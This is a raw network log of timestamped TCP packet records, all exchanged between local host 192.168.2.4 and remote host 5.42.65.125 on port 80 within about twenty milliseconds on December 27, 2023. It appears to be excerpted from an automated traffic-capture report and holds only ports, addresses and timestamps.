Dec 27, 2023 18:12:25.073885918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073966026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073977947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.073990107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074012995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.074040890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.074074030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074084997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074095964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074106932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074117899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074120045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.074130058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074141026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074145079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.074162960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.074892044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074947119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074959040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074970007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074984074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.074987888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.075020075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.075104952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075117111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075128078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075141907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075154066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075154066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.075166941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075177908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.075202942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.075803041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075876951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075889111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075923920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.075934887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075948000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075958967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075967073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.075969934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075980902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075993061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.075995922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.076004982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076015949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076021910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.076037884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.076689959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076702118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076729059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.076833010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076844931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076857090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076869011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.076873064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.076905966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.077203989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077217102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077239037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.077277899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077290058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077301025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077310085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.077327967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077337027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.077341080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077352047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077363968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077370882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.077395916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.077420950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077434063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.077467918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.078181028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078193903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078231096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078243971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078247070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.078367949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078380108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078391075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078402042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078406096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.078413963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078425884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078437090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.078440905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.078465939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.079210043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079222918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079232931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079245090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079255104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079260111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.079267025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079277039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.079278946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079291105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079297066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.079303026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079314947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079320908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.079327106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079346895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.079364061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.079982042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.079994917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080033064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.080056906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080070019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080080032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080104113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080110073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.080132008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080135107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.080144882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080178976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080183983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.080190897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080203056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080224991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.080887079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080899000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080952883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080965042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080976009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.080987930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081026077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.081413031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081425905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081437111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081460953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.081485987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.081516981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081557989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081569910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081593037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.081633091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081645012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081656933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081667900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.081670046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081686974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.081691027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.082346916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082359076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082381964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.082405090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.082449913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082461119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082473993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082484007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082495928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082496881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.082508087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082520008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082525015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.082531929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082541943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.082544088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.082566977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.083229065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083267927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.083291054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083303928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083314896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083326101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083339930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.083368063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.083369970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083381891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083393097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083410978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.083445072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083475113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.083492041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083504915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.083533049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.084247112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084294081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084373951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084386110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084397078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084407091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.084408998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084420919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084431887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084434032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.084448099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.084454060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084466934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084472895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.084477901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.084497929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085073948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085108042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085119963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085143089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085150957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085163116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085175037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085177898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085192919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085588932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085601091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085613012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085623980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085634947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085635900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085659027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085659027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085674047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085680962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085747957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085761070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085772038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085779905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085783958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.085804939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.085820913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.086442947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086493015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086504936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086527109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.086551905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086565018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086584091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.086586952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086616039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.086652994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086666107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086677074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086688042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086700916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.086708069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.086734056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.087511063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087522984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087554932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.087636948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087649107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087658882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087666988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.087670088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087681055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087692976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087692976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.087703943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087714911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087719917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.087726116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.087735891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.087762117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.088335037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088354111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088365078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088376999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088393927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.088395119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088407993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088408947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.088486910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088500023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088510990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088521004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.088522911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088536024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.088547945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.088560104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.089216948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089230061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089238882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089261055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.089267015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089277983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089283943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.089291096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089313984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.089802980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089818954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089849949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.089931965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089943886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089953899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089962959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.089965105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089977026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089987993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.089987993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.089999914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090010881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090013981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.090022087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090044975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.090070009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.090601921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090615034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090662956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090673923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090684891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090692997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.090697050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090718031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.090733051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.090745926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090758085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090769053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090780020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090790987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.090791941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.090816021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.091543913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091684103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091696024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091706991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091717958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091718912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.091728926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091739893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091743946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.091752052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091763020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091763020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.091773987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.091775894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091788054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.091799021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.091829062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.092612982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092623949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092634916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092645884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092657089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092660904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.092668056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092679024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092680931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.092694044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.092698097 CET	49738	80	192.168.2.4	5.42.65.125
